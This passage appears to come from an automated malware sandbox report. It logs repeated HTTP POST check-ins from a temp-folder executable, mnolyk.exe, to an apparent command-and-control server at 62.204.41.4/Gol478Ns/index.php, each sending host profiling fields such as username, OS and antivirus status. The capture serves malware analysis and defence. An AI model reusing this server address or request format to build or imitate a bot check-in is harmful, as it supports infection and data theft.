                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:45.446480989 CET774INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          62192.168.2.64978262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:06.291220903 CET182OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:06.356937885 CET182INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          620192.168.2.65034562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:45.626091003 CET775OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:45.689590931 CET775INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          621192.168.2.65034662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:45.861769915 CET776OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:45.927083969 CET776INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:45 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          622192.168.2.65034762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:46.099226952 CET777OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:46.165688038 CET777INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:46 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          623192.168.2.65034862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:46.349889040 CET778OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:46.412662029 CET778INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:46 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          624192.168.2.65034962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:46.609528065 CET779OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:46.673799038 CET779INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:46 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          625192.168.2.65035062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:46.848979950 CET780OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:46.912657022 CET780INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:46 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          626192.168.2.65035162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:47.097069025 CET781OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:47.161994934 CET781INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:47 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          627192.168.2.65035262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:47.357137918 CET782OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:47.420408010 CET782INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:47 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          628192.168.2.65035362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:47.599615097 CET783OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:47.664232969 CET783INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:47 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          629192.168.2.65035462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:47.847893000 CET784OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:47.911897898 CET784INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:47 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          63192.168.2.64978362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:06.638993979 CET183OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:06.706861973 CET183INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          630192.168.2.65035562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:48.094654083 CET785OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:48.159996033 CET785INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:48 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          631192.168.2.65035662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:48.331429005 CET786OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:48.396509886 CET786INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:48 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          632192.168.2.65035762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:48.563249111 CET786OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:48.626431942 CET787INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:48 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          633192.168.2.65035862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:48.800827980 CET788OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:48.862360954 CET788INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:48 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          634192.168.2.65035962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:49.032955885 CET789OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:49.098532915 CET789INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:49 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          635192.168.2.65036062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:49.278758049 CET790OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:49.343576908 CET790INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:49 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          636192.168.2.65036162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:49.565589905 CET790OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:49.628758907 CET791INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:49 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          637192.168.2.65036262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:49.798074961 CET792OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:03:49.861625910 CET792INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:03:49 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          638192.168.2.65036362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:03:50.032689095 CET793OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
